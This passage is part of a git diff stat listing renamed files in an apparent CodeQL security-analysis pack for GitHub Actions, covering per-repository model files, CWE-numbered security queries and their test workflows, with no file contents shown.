...dependencytrack_dependency-track.model.yml | 0 .../devexpress_testcafe.model.yml | 0 .../dfhack_dfhack.model.yml | 0 .../docker_build-push-action.model.yml | 0 .../dragonwell-project_dragonwell11.model.yml | 0 .../earthly_earthly.model.yml | 0 .../eclipse-vertx_vert.x.model.yml | 0 .../eclipse-vertx_vertx-sql-client.model.yml | 0 .../elastic_elasticsearch-net.model.yml | 0 .../element-hq_element-desktop.model.yml | 0 .../envoyproxy_envoy.model.yml | 0 .../etcd-io_bbolt.model.yml | 0 .../reusable-workflows/etcd-io_etcd.model.yml | 0 .../eventstore_eventstore.model.yml | 0 .../expensify_app.model.yml | 0 ...xternal-secrets_external-secrets.model.yml | 0 .../facebook_create-react-app.model.yml | 0 .../facebookresearch_xformers.model.yml | 0 .../falcosecurity_falco.model.yml | 0 .../fastify_fastify.model.yml | 0 .../ferretdb_ferretdb.model.yml | 0 .../filecoin-project_venus.model.yml | 0 .../firebase_firebase-unity-sdk.model.yml | 0 .../flarum_framework.model.yml | 0 .../fluent_fluent-bit.model.yml | 0 .../flux-iac_tofu-controller.model.yml | 0 .../flyteorg_flyte.model.yml | 0 .../foundatiofx_foundatio.model.yml | 0 .../freecad_freecad.model.yml | 0 .../getpelican_pelican.model.yml | 0 .../getporter_porter.model.yml | 0 .../getsentry_sentry-dart.model.yml | 0 .../getsentry_sentry-unity.model.yml | 0 .../gitpod-io_gitpod.model.yml | 0 .../gittools_gitversion.model.yml | 0 ...ooglecloudplatform_magic-modules.model.yml | 0 ...loudplatform_nodejs-docs-samples.model.yml | 0 .../gravitational_teleport.model.yml | 0 .../gravitl_netmaker.model.yml | 0 .../reusable-workflows/h2oai_wave.model.yml | 0 .../hadashia_vcontainer.model.yml | 0 .../hashgraph_hedera-services.model.yml | 0 .../hashicorp_boundary.model.yml | 0 .../hashicorp_consul.model.yml | 0 .../hashicorp_terraform-cdk.model.yml | 0 ...hashicorp_terraform-provider-tfe.model.yml | 0 .../hashicorp_terraform.model.yml | 0 .../hashicorp_vault.model.yml | 0 .../reusable-workflows/heroku_cli.model.yml | 0 .../hitobito_hitobito.model.yml | 0 .../home-assistant_operating-system.model.yml | 0 .../homuler_mediapipeunityplugin.model.yml | 0 .../huggingface_doc-builder.model.yml | 0 .../huggingface_transformers.model.yml | 0 .../hyperion-project_hyperion.ng.model.yml | 0 .../reusable-workflows/ibm_sarama.model.yml | 0 ...nloader_icloud_photos_downloader.model.yml | 0 .../immich-app_immich.model.yml | 0 .../reusable-workflows/inria_spoon.model.yml | 0 ...el-device-plugins-for-kubernetes.model.yml | 0 .../inverse-inc_packetfence.model.yml | 0 .../reusable-workflows/ispc_ispc.model.yml | 0 ..._intellij-platform-gradle-plugin.model.yml | 0 .../jupyter_docker-stacks.model.yml | 0 .../kairos-io_kairos.model.yml | 0 .../kanidm_kanidm.model.yml | 0 .../kata-containers_kata-containers.model.yml | 0 .../reusable-workflows/kiali_kiali.model.yml | 0 .../kotest_kotest.model.yml | 0 .../kubernetes_ingress-nginx.model.yml | 0 .../kubescape_kubescape.model.yml | 0 .../kubeshop_botkube.model.yml | 0 .../reusable-workflows/kumahq_kuma.model.yml | 0 .../labring_sealos.model.yml | 0 .../laion-ai_open-assistant.model.yml | 0 .../learningequality_kolibri.model.yml | 0 .../lensesio_stream-reactor.model.yml | 0 .../leptos-rs_leptos.model.yml | 0 .../lightning-ai_pytorch-lightning.model.yml | 0 .../liquibase_liquibase.model.yml | 0 .../litestar-org_litestar.model.yml | 0 .../reusable-workflows/llvm_circt.model.yml | 0 .../lnbits_lnbits.model.yml | 0 .../lutris_lutris.model.yml | 0 .../reusable-workflows/mailu_mailu.model.yml | 0 .../mamba-org_mamba.model.yml | 0 ...anticoresoftware_manticoresearch.model.yml | 0 .../marcelotduarte_cx_freeze.model.yml | 0 ...xaml_materialdesigninxamltoolkit.model.yml | 0 .../matter-labs_zksync-era.model.yml | 0 .../mattermost_desktop.model.yml | 0 .../mattermost_mattermost.model.yml | 0 .../mealie-recipes_mealie.model.yml | 0 .../meshery_meshery.model.yml | 0 .../meshtastic_firmware.model.yml | 0 .../microcks_microcks.model.yml | 0 ...crosoft_applicationinsights-java.model.yml | 0 .../microsoft_chat-copilot.model.yml | 0 .../microsoft_msquic.model.yml | 0 .../microsoft_oryx.model.yml | 0 .../microsoft_pr-metrics.model.yml | 0 ...oft_react-native-windows-samples.model.yml | 0 .../microsoft_vscode-cpptools.model.yml | 0 .../moby_buildkit.model.yml | 0 .../reusable-workflows/moby_moby.model.yml | 0 .../mosaicml_composer.model.yml | 0 .../msys2_setup-msys2.model.yml | 0 .../mudler_localai.model.yml | 0 .../mustardchef_wsabuilds.model.yml | 0 .../reusable-workflows/n8n-io_n8n.model.yml | 0 .../napari_napari.model.yml | 0 .../reusable-workflows/nasa_fprime.model.yml | 0 .../nautobot_nautobot.model.yml | 0 .../reusable-workflows/nektos_act.model.yml | 0 .../neondatabase_neon.model.yml | 0 .../neovim_neovim.model.yml | 0 .../nethermindeth_nethermind.model.yml | 0 .../newrelic_newrelic-dotnet-agent.model.yml | 0 .../newrelic_newrelic-java-agent.model.yml | 0 .../newrelic_node-newrelic.model.yml | 0 .../nexus-mods_nexusmods.app.model.yml | 0 .../nginxinc_kubernetes-ingress.model.yml | 0 .../nocodb_nocodb.model.yml | 0 .../reusable-workflows/novuhq_novu.model.yml | 0 .../npm_abbrev-js.model.yml | 0 .../reusable-workflows/npm_cli.model.yml | 0 .../npm_fs-minipass.model.yml | 0 .../npm_hosted-git-info.model.yml | 0 .../reusable-workflows/npm_ini.model.yml | 0 ...pm_json-parse-even-better-errors.model.yml | 0 .../npm_minify-registry-metadata.model.yml | 0 .../npm_mute-stream.model.yml | 0 .../npm_node-semver.model.yml | 0 .../npm_node-which.model.yml | 0 .../reusable-workflows/npm_nopt.model.yml | 0 .../npm_normalize-package-data.model.yml | 0 .../npm_write-file-atomic.model.yml | 0 .../onflow_cadence.model.yml | 0 .../open-goal_jak-project.model.yml | 0 ...pen-telemetry_opentelemetry-demo.model.yml | 0 ...try_opentelemetry-dotnet-contrib.model.yml | 0 ...n-telemetry_opentelemetry-dotnet.model.yml | 0 ...entelemetry-java-instrumentation.model.yml | 0 ...lemetry_opentelemetry-js-contrib.model.yml | 0 ...telemetry_opentelemetry-operator.model.yml | 0 .../openbao_openbao.model.yml | 0 .../openhab_openhab-docs.model.yml | 0 .../openmined_pysyft.model.yml | 0 .../opentofu_opentofu.model.yml | 0 .../openttd_openttd.model.yml | 0 .../openvinotoolkit_openvino.model.yml | 0 .../reusable-workflows/openxla_iree.model.yml | 0 .../reusable-workflows/openzfs_zfs.model.yml | 0 ...ator-framework_java-operator-sdk.model.yml | 0 .../orange-opensource_hurl.model.yml | 0 ...aolosalvatori_servicebusexplorer.model.yml | 0 .../parcel-bundler_parcel.model.yml | 0 .../pardeike_harmony.model.yml | 0 .../reusable-workflows/pcsx2_pcsx2.model.yml | 0 .../pennylaneai_pennylane.model.yml | 0 ...necone-io_pinecone-python-client.model.yml | 0 .../pixie-io_pixie.model.yml | 0 .../plantuml_plantuml.model.yml | 0 .../powerdns_pdns.model.yml | 0 .../preactjs_preact.model.yml | 0 .../prismlauncher_prismlauncher.model.yml | 0 .../product-os_flowzone.model.yml | 0 .../project-oak_oak.model.yml | 0 .../reusable-workflows/prql_prql.model.yml | 0 .../pulumi_pulumi.model.yml | 0 .../puppeteer_puppeteer.model.yml | 0 .../puppetlabs_puppetlabs-puppetdb.model.yml | 0 .../reusable-workflows/pyo3_maturin.model.yml | 0 .../reusable-workflows/pyo3_pyo3.model.yml | 0 .../python_cpython.model.yml | 0 .../pytorch_botorch.model.yml | 0 .../reusable-workflows/pytorch_xla.model.yml | 0 .../quarto-dev_quarto-cli.model.yml | 0 .../rancher_dashboard.model.yml | 0 .../rasterio_rasterio.model.yml | 0 .../redisearch_redisearch.model.yml | 0 .../remix-run_remix.model.yml | 0 .../rmcrackan_libation.model.yml | 0 .../rocketchat_rocket.chat.model.yml | 0 .../ruby_ruby.wasm.model.yml | 0 .../rustdesk_rustdesk.model.yml | 0 .../saadeghi_daisyui.model.yml | 0 .../sagemath_sage.model.yml | 0 .../schemastore_schemastore.model.yml | 0 .../scikit-learn_scikit-learn.model.yml | 0 .../seleniumhq_selenium.model.yml | 0 .../shaka-project_shaka-packager.model.yml | 0 .../shaka-project_shaka-player.model.yml | 0 .../shimataro_ssh-key-action.model.yml | 0 .../softfever_orcaslicer.model.yml | 0 ...-mansion_react-native-reanimated.model.yml | 0 .../solana-labs_solana.model.yml | 0 .../sonarr_sonarr.model.yml | 0 .../speedb-io_speedb.model.yml | 0 ...ring-cloud_spring-cloud-dataflow.model.yml | 0 .../sqlfluff_sqlfluff.model.yml | 0 .../stdlib-js_stdlib.model.yml | 0 .../stereokit_stereokit.model.yml | 0 .../streetsidesoftware_cspell.model.yml | 0 .../supabase_auth.model.yml | 0 .../reusable-workflows/supabase_cli.model.yml | 0 .../tencent_hippy.model.yml | 0 .../tgstation_tgstation.model.yml | 0 .../thesofproject_sof.model.yml | 0 .../tiann_kernelsu.model.yml | 0 .../tiledb-inc_tiledb.model.yml | 0 .../toeverything_affine.model.yml | 0 .../tracel-ai_burn.model.yml | 0 .../tribler_tribler.model.yml | 0 .../ubisoft_sharpmake.model.yml | 0 .../unity-technologies_ml-agents.model.yml | 0 .../reusable-workflows/urbit_urbit.model.yml | 0 .../uyuni-project_uyuni.model.yml | 0 .../vert-x3_vertx-hazelcast.model.yml | 0 .../reusable-workflows/vkcom_vkui.model.yml | 0 .../walletconnect_web3modal.model.yml | 0 .../warzone2100_warzone2100.model.yml | 0 .../wasmedge_wasmedge.model.yml | 0 .../web-infra-dev_rspack.model.yml | 0 .../reusable-workflows/werf_werf.model.yml | 0 .../widdix_aws-cf-templates.model.yml | 0 .../wildfly_wildfly.model.yml | 0 .../yt-dlp_yt-dlp.model.yml | 0 .../zenml-io_zenml.model.yml | 0 .../zephyrproject-rtos_zephyr.model.yml | 0 .../zitadel_zitadel.model.yml | 0 .../ext/manual/8398a7_action-slack.model.yml | 0 .../manual/AsasInnab_regex-action.model.yml | 0 .../ext/manual/MeilCli_regex-match.model.yml | 0 ...rSource_sonarcloud-github-action.model.yml | 0 .../Steph0_dotenv-configserver.model.yml | 0 ...us_github-action-files-in-commit.model.yml | 0 .../manual/aarcangeli_load-dotenv.model.yml | 0 .../ab185508_file-type-finder.model.yml | 0 ...ons-ecosystem_action-regex-match.model.yml | 0 .../manual/actions_github-script.model.yml | 0 ...ahmadnassri_action-changed-files.model.yml | 0 .../manual/akefirad_loadenv-action.model.yml | 0 .../manual/akhileshns_heroku-deploy.model.yml | 0 ...bell_pull-request-comment-branch.model.yml | 0 ...nnn_action-semantic-pull-request.model.yml | 0 .../ext/manual/anchore_sbom-action.model.yml | 0 .../ext/manual/anchore_scan-action.model.yml | 0 .../andresz1_size-limit-action.model.yml | 0 .../android-actions_setup-android.model.yml | 0 .../ankitjain28may_list-files-in-pr.model.yml | 0 ...le-actions_import-codesign-certs.model.yml | 0 .../ext/manual/appleboy_ssh-action.model.yml | 0 .../lib/ext/manual/asdf-vm_actions.model.yml | 0 ...taylor_read-json-property-action.model.yml | 0 ...ley-taylor_regex-property-action.model.yml | 0 .../aszc_change-string-case-action.model.yml | 0 ...aamMavridis_files-changed-action.model.yml | 0 ...ctions_configure-aws-credentials.model.yml | 0 .../axel-op_googlejavaformat-action.model.yml | 0 .../ql}/lib/ext/manual/azure_cli.model.yml | 0 .../lib/ext/manual/azure_powershell.model.yml | 0 .../ext/manual/bahmutov_npm-install.model.yml | 0 .../blackducksoftware_github-action.model.yml | 0 .../manual/bobheadxi_deployments.model.yml | 0 .../bufbuild_buf-breaking-action.model.yml | 0 .../manual/bufbuild_buf-lint-action.model.yml | 0 .../bufbuild_buf-setup-action.model.yml | 0 .../c-py_action-dotenv-to-setenv.model.yml | 0 .../ext/manual/cachix_cachix-action.model.yml | 0 .../ext/manual/changesets_action.model.yml | 0 .../cloudflare_wrangler-action.model.yml | 0 .../cosq-network_dotenv-loader.model.yml | 0 .../manual/coursier_cache-action.model.yml | 0 .../crazy-max_ghaction-chocolatey.model.yml | 0 .../crazy-max_ghaction-import-gpg.model.yml | 0 .../csexton_release-asset-action.model.yml | 0 ...cycjimmy_semantic-release-action.model.yml | 0 .../manual/cypress-io_github-action.model.yml | 0 .../dailydotdev_action-devcard.model.yml | 0 ...me_reportgenerator-github-action.model.yml | 0 .../daspn_private-actions-checkout.model.yml | 0 .../dawidd6_action-ansible-playbook.model.yml | 0 ...dawidd6_action-download-artifact.model.yml | 0 .../manual/delaguardo_setup-clojure.model.yml | 0 ...tesystems_magic-nix-cache-action.model.yml | 0 .../devorbitus_yq-action-output.model.yml | 0 ...er-practice_actions-setup-docker.model.yml | 0 .../manual/docker_build-push-action.model.yml | 0 ...3d_action-extract-unique-matches.model.yml | 0 .../manual/eficode_resolve-pr-refs.model.yml | 0 .../ext/manual/endbug_latest-tag.model.yml | 0 .../manual/expo_expo-github-action.model.yml | 0 ...seextended_action-hosting-deploy.model.yml | 0 .../frabert_replace-string-action.model.yml | 0 ...nzdiebold_github-env-vars-action.model.yml | 0 .../manual/gabrielbb_xvfb-action.model.yml | 0 .../manual/game-ci_unity-builder.model.yml | 0 .../game-ci_unity-test-runner.model.yml | 0 ...autamkrishnar_blog-post-workflow.model.yml | 0 .../manual/getsentry_action-release.model.yml | 0 .../ext/manual/github_codeql-action.model.yml | 0 .../go-semantic-release_action.model.yml | 0 .../golangci_golangci-lint-action.model.yml | 0 .../gonuit_heroku-docker-deploy.model.yml | 0 .../goreleaser_goreleaser-action.model.yml | 0 ...tson_pull-request-comment-branch.model.yml | 0 ...te-or-update-pull-request-action.model.yml | 0 .../gradle_gradle-build-action.model.yml | 0 .../manual/haya14busa_action-cond.model.yml | 0 .../manual/hexlet_project-action.model.yml | 0 .../ext/manual/ilammy_msvc-dev-cmd.model.yml | 0 .../ext/manual/ilammy_setup-nasm.model.yml | 0 .../ext/manual/imjohnbo_issue-bot.model.yml | 0 .../ext/manual/iterative_setup-cml.model.yml | 0 .../ext/manual/iterative_setup-dvc.model.yml | 0 ...sives_github-pages-deploy-action.model.yml | 0 .../jitterbit_get-changed-files.model.yml | 0 .../johnnymorganz_stylua-action.model.yml | 0 .../manual/jsdaniell_create-json.model.yml | 0 .../jsmith_changes-since-last-tag.model.yml | 0 .../jurplel_install-qt-action.model.yml | 0 .../ext/manual/jwalton_gh-ecr-push.model.yml | 0 .../kaisugi_action-regex-match.model.yml | 0 ...rpikpl_list-changed-files-action.model.yml | 0 ...han_pull-request-comment-trigger.model.yml | 0 .../ext/manual/knu_changed-files.model.yml | 0 ...leci-artifacts-redirector-action.model.yml | 0 .../ext/manual/leafo_gh-actions-lua.model.yml | 0 .../leafo_gh-actions-luarocks.model.yml | 0 ...logs_gh-action-get-changed-files.model.yml | 0 .../lucasbento_auto-close-issues.model.yml | 0 ...felipelaviola_parse-plain-dotenv.model.yml | 0 ..._actions-find-and-replace-string.model.yml | 0 .../ext/manual/magefile_mage-action.model.yml | 0 .../manual/maierj_fastlane-action.model.yml | 0 .../manusa_actions-setup-minikube.model.yml | 0 .../manual/marocchino_on_artifact.model.yml | 0 .../martinhaintz_ga-file-list.model.yml | 0 .../manual/mattdavis0351_actions.model.yml | 0 .../meteorengineer_setup-meteor.model.yml | 0 ...tro-digital_setup-tools-for-waas.model.yml | 0 .../manual/microsoft_setup-msbuild.model.yml | 0 .../ql}/lib/ext/manual/mikefarah_yq.model.yml | 0 ...mishakav_pytest-coverage-comment.model.yml | 0 ...hers-excellent_docker-build-push.model.yml | 0 .../ext/manual/msys2_setup-msys2.model.yml | 0 .../manual/mxschmitt_action-tmate.model.yml | 0 .../manual/mymindstorm_setup-emsdk.model.yml | 0 .../nanasess_setup-chromedriver.model.yml | 0 .../ext/manual/nanasess_setup-php.model.yml | 0 .../ext/manual/nick-fields_retry.model.yml | 0 .../manual/octokit_graphql-action.model.yml | 0 .../manual/octokit_request-action.model.yml | 0 .../ext/manual/olafurpg_setup-scala.model.yml | 0 .../paambaati_codeclimate-action.model.yml | 0 ...ulschuberth_regex-extract-action.model.yml | 0 .../peter-evans_create-pull-request.model.yml | 0 ...-murray_issue-body-parser-action.model.yml | 0 ...r-murray_issue-forms-body-parser.model.yml | 0 .../plasmicapp_plasmic-action.model.yml | 0 .../potiuk_get-workflow-origin.model.yml | 0 .../preactjs_compressed-size-action.model.yml | 0 .../ext/manual/py-actions_flake8.model.yml | 0 ...py-actions_py-dependency-install.model.yml | 0 .../ext/manual/pyo3_maturin-action.model.yml | 0 ...vecircus_android-emulator-runner.model.yml | 0 .../ext/manual/read-file-actions.model.yml | 0 ...bers-in-action_download-artifact.model.yml | 0 .../ext/manual/reggionick_s3-deploy.model.yml | 0 .../ext/manual/release-kit_regex.model.yml | 0 .../renovatebot_github-action.model.yml | 0 .../rishabh510_path-lister-action.model.yml | 0 .../roots_issue-closer-action.model.yml | 0 .../manual/ros-tooling_setup-ros.model.yml | 0 .../lib/ext/manual/ruby_setup-ruby.model.yml | 0 ...ction-detect-and-tag-new-version.model.yml | 0 .../ext/manual/sergeysova_jq-action.model.yml | 0 ...shallwefootball_upload-s3-action.model.yml | 0 .../shogo82148_actions-setup-perl.model.yml | 0 ...skitionek_notify-microsoft-teams.model.yml | 0 .../ext/manual/snow-actions_eclint.model.yml | 0 .../stackhawk_hawkscan-action.model.yml | 0 .../step-security_harden-runner.model.yml | 0 .../suisei-cn_actions-download-file.model.yml | 0 .../the-coding-turtle_ga-file-list.model.yml | 0 .../lib/ext/manual/tibdex_backport.model.yml | 0 .../tim-actions_get-pr-commits.model.yml | 0 .../manual/timheuer_base64-to-file.model.yml | 0 .../manual/tj-actions_branch-names.model.yml | 0 ...tmelliottjr_extract-regex-action.model.yml | 0 .../trilom_file-changes-action.model.yml | 0 ...ss_conventional-changelog-action.model.yml | 0 .../tryghost_action-deploy-theme.model.yml | 0 .../manual/tzkhan_pr-update-action.model.yml | 0 .../manual/veracode_veracode-sca.model.yml | 0 .../w3f_action-find-old-files.model.yml | 0 .../wearerequired_lint-action.model.yml | 0 .../ext/manual/webfactory_ssh-agent.model.yml | 0 .../lib/ext/manual/xom9ikk_dotenv.model.yml | 0 ...rted_pull-request-comment-branch.model.yml | 0 .../manual/yumemi-inc_changed-files.model.yml | 0 .../manual/zaproxy_action-baseline.model.yml | 0 .../manual/zaproxy_action-full-scan.model.yml | 0 ...zentered_issue-forms-body-parser.model.yml | 0 .../lib/ide-contextual-queries/printAst.ql | 0 .../lib/ide-contextual-queries/printCfg.ql | 0 {ql => actions/ql}/lib/qlpack.yml | 0 {ql => actions/ql}/src/Debug/SyntaxError.ql | 0 {ql => actions/ql}/src/Debug/partial.ql | 0 .../ql}/src/Models/CompositeActionsSinks.ql | 0 .../ql}/src/Models/CompositeActionsSources.ql | 0 .../src/Models/CompositeActionsSummaries.ql | 0 .../ql}/src/Models/ReusableWorkflowsSinks.ql | 0 .../src/Models/ReusableWorkflowsSources.ql | 0 .../src/Models/ReusableWorkflowsSummaries.ql | 0 .../Security/CWE-074/OutputClobberingHigh.ql | 0 .../CWE-077/EnvPathInjectionCritical.md | 0 .../CWE-077/EnvPathInjectionCritical.ql | 0 .../CWE-077/EnvPathInjectionMedium.md | 0 .../CWE-077/EnvPathInjectionMedium.ql | 0 .../CWE-077/EnvVarInjectionCritical.md | 0 .../CWE-077/EnvVarInjectionCritical.ql | 0 .../Security/CWE-077/EnvVarInjectionMedium.md | 0 .../Security/CWE-077/EnvVarInjectionMedium.ql | 0 .../CWE-078/CommandInjectionCritical.ql | 0 .../CWE-078/CommandInjectionMedium.ql | 0 .../CWE-088/ArgumentInjectionCritical.md | 0 .../CWE-088/ArgumentInjectionCritical.ql | 0 .../CWE-088/ArgumentInjectionMedium.md | 0 .../CWE-088/ArgumentInjectionMedium.ql | 0 .../Security/CWE-094/CodeInjectionCritical.md | 0 .../Security/CWE-094/CodeInjectionCritical.ql | 0 .../Security/CWE-094/CodeInjectionMedium.md | 0 .../Security/CWE-094/CodeInjectionMedium.ql | 0 .../CWE-1395/UseOfKnownVulnerableAction.md | 0 .../CWE-1395/UseOfKnownVulnerableAction.ql | 0 .../Security/CWE-200/SecretExfiltration.ql | 0 .../CWE-275/MissingActionsPermissions.md | 0 .../CWE-275/MissingActionsPermissions.ql | 0 .../CodeExecutionOnSelfHostedRunner.ql | 0 .../Security/CWE-285/ImproperAccessControl.md | 0 .../Security/CWE-285/ImproperAccessControl.ql | 0 .../CWE-312/ExcessiveSecretsExposure.md | 0 .../CWE-312/ExcessiveSecretsExposure.ql | 0 .../Security/CWE-312/SecretsInArtifacts.md | 0 .../Security/CWE-312/SecretsInArtifacts.ql | 0 .../CWE-312/UnmaskedSecretExposure.md | 0 .../CWE-312/UnmaskedSecretExposure.ql | 0 .../CWE-349/CachePoisoningViaCodeInjection.md | 0 .../CWE-349/CachePoisoningViaCodeInjection.ql | 0 .../CWE-349/CachePoisoningViaDirectCache.md | 0 .../CWE-349/CachePoisoningViaDirectCache.ql | 0 .../CachePoisoningViaPoisonableStep.md | 0 .../CachePoisoningViaPoisonableStep.ql | 0 .../UntrustedCheckoutTOCTOUCritical.md | 0 .../UntrustedCheckoutTOCTOUCritical.ql | 0 .../CWE-367/UntrustedCheckoutTOCTOUHigh.md | 0 .../CWE-367/UntrustedCheckoutTOCTOUHigh.ql | 0 .../CWE-571/ExpressionIsAlwaysTrueCritical.md | 0 .../CWE-571/ExpressionIsAlwaysTrueCritical.ql | 0 .../CWE-571/ExpressionIsAlwaysTrueHigh.md | 0 .../CWE-571/ExpressionIsAlwaysTrueHigh.ql | 0 .../CWE-829/ArtifactPoisoningCritical.md | 0 .../CWE-829/ArtifactPoisoningCritical.ql | 0 .../CWE-829/ArtifactPoisoningMedium.md | 0 .../CWE-829/ArtifactPoisoningMedium.ql | 0 .../CWE-829/ArtifactPoisoningPathTraversal.ql | 0 .../Security/CWE-829/UnpinnedActionsTag.md | 0 .../Security/CWE-829/UnpinnedActionsTag.ql | 0 .../CWE-829/UntrustedCheckoutCritical.md | 0 .../CWE-829/UntrustedCheckoutCritical.ql | 0 .../Security/CWE-829/UntrustedCheckoutHigh.md | 0 .../Security/CWE-829/UntrustedCheckoutHigh.ql | 0 .../CWE-829/UntrustedCheckoutMedium.md | 0 .../CWE-829/UntrustedCheckoutMedium.ql | 0 .../CWE-829/UnversionedImmutableAction.md | 0 .../CWE-829/UnversionedImmutableAction.ql | 0 .../src/Security/CWE-918/RequestForgery.ql | 0 .../CodeQL/UnnecessaryUseOfAdvancedConfig.md | 0 .../CodeQL/UnnecessaryUseOfAdvancedConfig.ql | 0 {ql => actions/ql}/src/codeql-pack.lock.yml | 0 .../ql}/src/codeql-suites/actions-all.qls | 0 .../src/codeql-suites/actions-bughalla.qls | 0 .../codeql-suites/actions-code-scanning.qls | 0 .../actions-security-and-quality.qls | 0 .../actions-summaries-queries.qls | 0 {ql => actions/ql}/src/qlpack.yml | 0 {ql => actions/ql}/test/codeql-pack.lock.yml | 0 .../.github/workflows/commands.yml | 0 .../.github/workflows/expression_nodes.yml | 0 .../.github/workflows/multiline.yml | 0 .../.github/workflows/multiline2.yml | 0 .../.github/workflows/poisonable_steps.yml | 0 .../library-tests/.github/workflows/shell.yml | 0 .../library-tests/.github/workflows/test.yml | 0 .../ql}/test/library-tests/commands.expected | 0 .../ql}/test/library-tests/commands.ql | 0 .../library-tests/poisonable_steps.expected | 0 .../test/library-tests/poisonable_steps.ql | 0 .../ql}/test/library-tests/test.expected | 0 {ql => actions/ql}/test/library-tests/test.ql | 0 .../test/library-tests/workflowenum.expected | 0 .../ql}/test/library-tests/workflowenum.ql | 0 {ql => actions/ql}/test/qlpack.yml | 0 .../.github/workflows/calling_composite.yml | 0 .../.github/workflows/calling_workflow.yml | 0 .../.github/workflows/reusable_workflow.yml | 0 .../Models/CompositeActionsSinks.expected | 0 .../Models/CompositeActionsSinks.qlref | 0 .../Models/CompositeActionsSources.expected | 0 .../Models/CompositeActionsSources.qlref | 0 .../Models/CompositeActionsSummaries.expected | 0 .../Models/CompositeActionsSummaries.qlref | 0 .../Models/ReusableWorkflowsSinks.expected | 0 .../Models/ReusableWorkflowsSinks.qlref | 0 .../Models/ReusableWorkflowsSources.expected | 0 .../Models/ReusableWorkflowsSources.qlref | 0 .../ReusableWorkflowsSummaries.expected | 0 .../Models/ReusableWorkflowsSummaries.qlref | 0 .../query-tests/Models/action1/action.yml | 0 .../CWE-074/.github/workflows/output1.yml | 0 .../CWE-074/.github/workflows/output2.yml | 0 .../CWE-074/OutputClobberingHigh.expected | 0 .../CWE-074/OutputClobberingHigh.qlref | 0 .../actions/download-artifact-2/action.yaml | 0 .../actions/download-artifact/action.yaml | 0 .../.github/workflows/artifactpoisoning51.yml | 0 .../.github/workflows/artifactpoisoning52.yml | 0 .../.github/workflows/artifactpoisoning53.yml | 0 .../.github/workflows/artifactpoisoning91.yml | 0 .../.github/workflows/artifactpoisoning92.yml | 0 .../CWE-077/.github/workflows/path1.yml | 0 .../CWE-077/.github/workflows/test1.yml | 0 .../CWE-077/.github/workflows/test10.yml | 0 .../CWE-077/.github/workflows/test11.yml | 0 .../CWE-077/.github/workflows/test12.yml | 0 .../CWE-077/.github/workflows/test13.yml | 0 .../CWE-077/.github/workflows/test14.yml | 0 .../CWE-077/.github/workflows/test15.yml | 0 .../CWE-077/.github/workflows/test16.yml | 0 .../CWE-077/.github/workflows/test17.yml | 0 .../CWE-077/.github/workflows/test18.yml | 0 .../CWE-077/.github/workflows/test19.yml | 0 .../CWE-077/.github/workflows/test2.yml | 0 .../CWE-077/.github/workflows/test3.yml | 0 .../CWE-077/.github/workflows/test4.yml | 0 .../CWE-077/.github/workflows/test5.yml | 0 .../CWE-077/.github/workflows/test6.yml | 0 .../CWE-077/.github/workflows/test7.yml | 0 .../CWE-077/.github/workflows/test8.yml | 0 .../CWE-077/.github/workflows/test9.yml | 0 .../CWE-077/EnvPathInjectionCritical.expected | 0 .../CWE-077/EnvPathInjectionCritical.qlref | 0 .../CWE-077/EnvPathInjectionMedium.expected | 0 .../CWE-077/EnvPathInjectionMedium.qlref | 0 .../CWE-077/EnvVarInjectionCritical.expected | 0 .../CWE-077/EnvVarInjectionCritical.qlref | 0 .../CWE-077/EnvVarInjectionMedium.expected | 0 .../CWE-077/EnvVarInjectionMedium.qlref | 0 .../actions/run-airbyte-ci/action.yaml | 0 .../.github/workflows/comment_issue.yml | 0 .../.github/workflows/documentation.yml | 0 .../CWE-078/.github/workflows/test1.yml | 0 .../CWE-078/CommandInjectionCritical.expected | 0 .../CWE-078/CommandInjectionCritical.qlref | 0 .../CWE-078/CommandInjectionMedium.expected | 0 .../CWE-078/CommandInjectionMedium.qlref | 0 .../.github/workflows/arg_injection.yml | 0 .../ArgumentInjectionCritical.expected | 0 .../CWE-088/ArgumentInjectionCritical.qlref | 0 .../CWE-088/ArgumentInjectionMedium.expected | 0 .../CWE-088/ArgumentInjectionMedium.qlref | 0 .../.github/actions/action1/action.yml | 0 .../.github/actions/action2/action.yml | 0 .../.github/actions/action3/action.yml | 0 .../.github/actions/action4/action.yml | 0 .../.github/actions/action5/action.yml | 0 .../.github/actions/action6/action.yml | 0 .../.github/actions/action7/action.yml | 0 .../.github/actions/clone-repo/action.yaml | 0 .../external/ultralytics/actions/action.yaml | 0 .../.github/workflows/argus_case_study.yml | 0 .../.github/workflows/artifactpoisoning1.yml | 0 .../.github/workflows/artifactpoisoning2.yml | 0 .../.github/workflows/artifactpoisoning3.yml | 0 .../.github/workflows/artifactpoisoning4.yml | 0 .../.github/workflows/artifactpoisoning5.yml | 0 .../.github/workflows/artifactpoisoning6.yml | 0 .../.github/workflows/artifactpoisoning7.yml | 0 .../.github/workflows/artifactpoisoning8.yml | 0 .../.github/workflows/changed-files.yml | 0 .../.github/workflows/comment_issue.yml | 0 .../workflows/comment_issue_newline.yml | 0 .../workflows/composite-action-caller-1.yml | 0 .../workflows/composite-action-caller-2.yml | 0 .../workflows/composite-action-caller-3.yml | 0 .../workflows/composite-action-caller-4.yml | 0 .../CWE-094/.github/workflows/cross1.yml | 0 .../CWE-094/.github/workflows/cross2.yml | 0 .../CWE-094/.github/workflows/cross3.yml | 0 .../CWE-094/.github/workflows/discussion.yml | 0 .../.github/workflows/discussion_comment.yml | 0 .../.github/workflows/publishResults.yml | 0 .../.github/workflows/reusable-workflow.yml | 0 .../CWE-094/.github/workflows/gollum.yml | 0 .../workflows/image_link_generator.yml | 0 .../CWE-094/.github/workflows/inter-job0.yml | 0 .../CWE-094/.github/workflows/inter-job1.yml | 0 .../CWE-094/.github/workflows/inter-job2.yml | 0 .../CWE-094/.github/workflows/inter-job4.yml | 0 .../CWE-094/.github/workflows/inter-job5.yml | 0 .../CWE-094/.github/workflows/issues.yaml | 0 .../CWE-094/.github/workflows/json_wrap.yml | 0 .../CWE-094/.github/workflows/level0.yml | 0 .../CWE-094/.github/workflows/level1.yml | 0 .../CWE-094/.github/workflows/matrix.yml | 0 .../CWE-094/.github/workflows/matrix_flow.yml | 0 .../CWE-094/.github/workflows/no-flow1.yml | 0 .../CWE-094/.github/workflows/no-flow2.yml | 0 .../.github/workflows/output_clobbering1.yml | 0 .../.github/workflows/output_clobbering2.yml | 0 .../.github/workflows/priv_pull_request.yml | 0 .../.github/workflows/pull_request_review.yml | 0 .../workflows/pull_request_review_comment.yml | 0 .../.github/workflows/pull_request_target.yml | 0 .../CWE-094/.github/workflows/push.yml | 0 .../.github/workflows/reusable-workflow-1.yml | 0 .../.github/workflows/reusable-workflow-2.yml | 0 